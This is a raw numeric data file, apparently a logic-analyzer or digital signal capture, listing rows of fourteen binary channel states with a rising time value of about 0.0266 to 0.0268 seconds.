0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649132e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6649140e-02 0,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6649184e-02 0,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6649208e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649216e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649236e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649260e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649284e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649308e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649356e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649384e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649408e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649432e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649484e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649508e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649556e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649584e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649636e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649660e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649684e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649708e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649732e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649756e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649784e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649808e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649832e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649860e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649884e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649908e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649932e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6649956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6649984e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650008e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650036e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650060e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650084e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650108e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650132e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650156e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650184e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650208e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650236e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650260e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650284e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650308e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650332e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650356e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650384e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650408e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650436e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650460e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650484e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650508e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650532e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650580e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650604e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650656e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650680e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650708e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650732e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650756e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650780e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650804e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650856e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650880e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650908e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650932e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6650956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6650980e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651004e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651056e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651080e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651108e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651132e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651156e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651180e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651204e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651256e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651280e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651308e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651332e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651356e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651380e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651404e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651456e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651480e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651508e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651532e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651580e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651604e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651656e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651680e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651708e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651732e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651756e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651780e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651804e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651856e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651880e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651908e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651932e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6651956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6651980e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652004e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652028e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652056e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652080e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652108e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652132e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652156e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652180e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652204e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652228e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652256e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652280e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652308e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652332e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652356e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652380e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652404e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652428e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652456e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652480e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652508e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652532e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652556e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652580e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652604e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652628e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652656e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652680e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652708e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652732e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652756e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652780e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652804e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652828e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652856e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652880e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652908e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652932e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6652956e-02 0,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6652980e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6653004e-02 0,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6777340e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6777540e-02 1,1,0,1,1,0,0,0,0,0,0,1,0,1,2.6777572e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6777592e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6777884e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,1,2.6777912e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,2.6777916e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,1,2.6777956e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,2.6777984e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,1,2.6777988e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6777992e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6778008e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6778036e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6778060e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6778084e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,1,2.6778108e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.6778132e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,1,2.6778140e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778172e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6778184e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778208e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,2.6778216e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778220e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6778236e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778260e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778264e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6778308e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778332e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778340e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6778356e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778380e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6778408e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778436e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6778460e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778484e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6778508e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778532e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778540e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6778580e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778608e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778612e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6778636e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778660e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778664e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6778708e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778740e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6778780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778808e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778812e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6778836e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778860e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6778884e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778908e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6778932e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6778956e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6778964e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779012e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779036e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779060e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779084e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779156e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779164e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6779180e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779208e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6779236e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779260e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6779284e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779308e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779316e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779360e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779380e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779388e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6779436e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779460e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779468e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779484e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779580e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779608e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779660e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779684e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,2.6779688e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779692e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6779732e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779756e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779764e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779812e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779836e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779860e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779884e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6779908e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779932e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779940e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6779956e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6779980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6779988e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780036e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780060e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780064e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6780084e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780108e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6780132e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780156e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6780180e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780208e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780212e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780260e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780284e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780308e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780332e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780340e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6780384e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780408e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780416e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780460e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780484e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,2.6780488e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780492e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6780508e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780532e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6780556e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780584e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6780608e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780636e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780640e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780684e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780812e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,2.6780836e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780840e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6780860e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780884e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780892e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780908e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780932e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6780956e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6780984e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6780988e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6781036e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6781060e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781068e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781084e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781108e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781156e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6781164e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6781184e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6781208e-02 1,1,0,1,1,1,0,0,0,0,0,0,0,0,2.6781212e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781216e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781260e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781284e-02 1,1,0,1,1,0,0,0,0,1,0,0,0,0,2.6781288e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6781292e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6781308e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6781332e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6781356e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6781384e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.6781408e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.6781436e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781440e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781484e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781584e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781608e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781636e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781660e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781684e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781784e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781808e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781836e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781860e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781884e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781908e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781932e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6781956e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6781984e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782008e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782036e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782060e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782084e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782108e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782184e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782208e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782236e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782260e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782284e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782308e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782332e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782356e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782380e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782404e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782428e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782456e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782480e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782580e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782628e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782656e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782680e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782804e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782828e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782856e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782884e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782908e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782932e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6782956e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6782980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783004e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783028e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783056e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783080e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783108e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783180e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783204e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783228e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783256e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783280e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783308e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783332e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783356e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783380e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783404e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783432e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783456e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783480e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.6783556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.6783580e-02 